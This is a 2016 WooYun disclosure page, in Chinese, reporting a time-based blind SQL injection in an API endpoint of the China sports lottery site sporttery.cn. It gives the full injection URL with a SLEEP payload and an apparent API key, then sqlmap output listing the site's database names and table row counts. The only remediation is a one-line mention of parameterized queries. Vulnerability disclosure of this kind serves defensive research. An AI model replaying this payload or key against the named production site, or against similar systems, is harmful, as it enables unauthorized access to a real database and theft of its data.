竞彩网某接口注入涉及3000W数据 | wooyun-2016-0191289| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0191289

漏洞标题：竞彩网某接口注入涉及3000W数据

漏洞作者：路人甲

提交时间：2016-04-01 11:21

修复时间：2016-05-16 11:30

公开时间：2016-05-16 11:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-04-01：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-16：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

中国竞彩网是中国体育采彡PIAO竞猜游戏官方信息发布平台。

详细说明：

http://info.sporttery.cn/interface/interface_new.php?a=contents_list&auth_type=key&auth_value=4u5j7k8l-1e3c-d3r6-7t9k-g7h1-4f6f7f3e&date=2011-03-29' AND (SELECT * FROM (SELECT(SLEEP(5)))KHZL)and '9270'='9270&dpc=1&format=json

漏洞证明：

Parameter: date (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: a=contents_list&auth_type=key&auth_value=4u5j7k8l-1e3c-d3r6-7t9k-g7h1-4f6f7f3e&date=2011-03-29' AND (SELECT * FROM (SELECT(SLEEP(5)))KHZL)and '9270'='9270&dpc=1&format=json
---
[20:55:47] [INFO] the back-end DBMS is MySQL
web application technology: Apache, Apache 2.2.29, PHP 5.3.29
back-end DBMS: MySQL 5.0.12
[20:55:47] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[20:55:47] [INFO] fetching database names
[20:55:47] [INFO] fetching number of databases
[20:55:47] [INFO] resumed: 13
[20:55:47] [INFO] resumed: information_schema
[20:55:47] [INFO] resumed: account
[20:55:47] [INFO] resumed: account_log
[20:55:47] [INFO] resumed: cms_plus
[20:55:47] [INFO] resumed: comments
[20:55:47] [INFO] resumed: data_center
[20:55:47] [INFO] resumed: datacenter
[20:55:47] [INFO] resumed: lottery_cms_plus
[20:55:47] [INFO] resumed: mysql
[20:55:47] [INFO] resumed: sporttery
[20:55:47] [INFO] resumed: star
[20:55:47] [INFO] resumed: test
[20:55:47] [INFO] resumed: virtual_soccer
Database: sporttery
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| cdn_apache_log                        | 82547955 |
| tip_fb_three                          | 79317100 |
| lottery_vote_history                  | 33330578 |
| tip_fb_asia                           | 28484126 |
| tc_site_time                          | 20834026 |
| tc_win007_detail                      | 14306822 |
| tc_goal_detail                        | 8345684 |
| tc_goal_change                        | 4953919 |
| tip_bk_two                            | 4760247 |
| fb_spvalue_hhad                       | 4213724 |
| tc_7m_detail                          | 4131791 |
| match_vote                            | 3036335 |
| wx_receive_log                        | 2953996 |
| tip_fb_asia_count                     | 2800716 |
| tip_bk_hdc                            | 2205138 |
| tc_win007_change                      | 1630263 |
| fb_spvalue_crs                        | 1595340 |
| tc_win007_league                      | 1587009 |
| tip_bk_total                          | 1504659 |
| fb_spvalue_ttg                        | 1387881 |
| fb_spvalue_had                        | 1258856 |
| tc_7m_league                          | 1241455 |

修复方案：

参数化查询

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)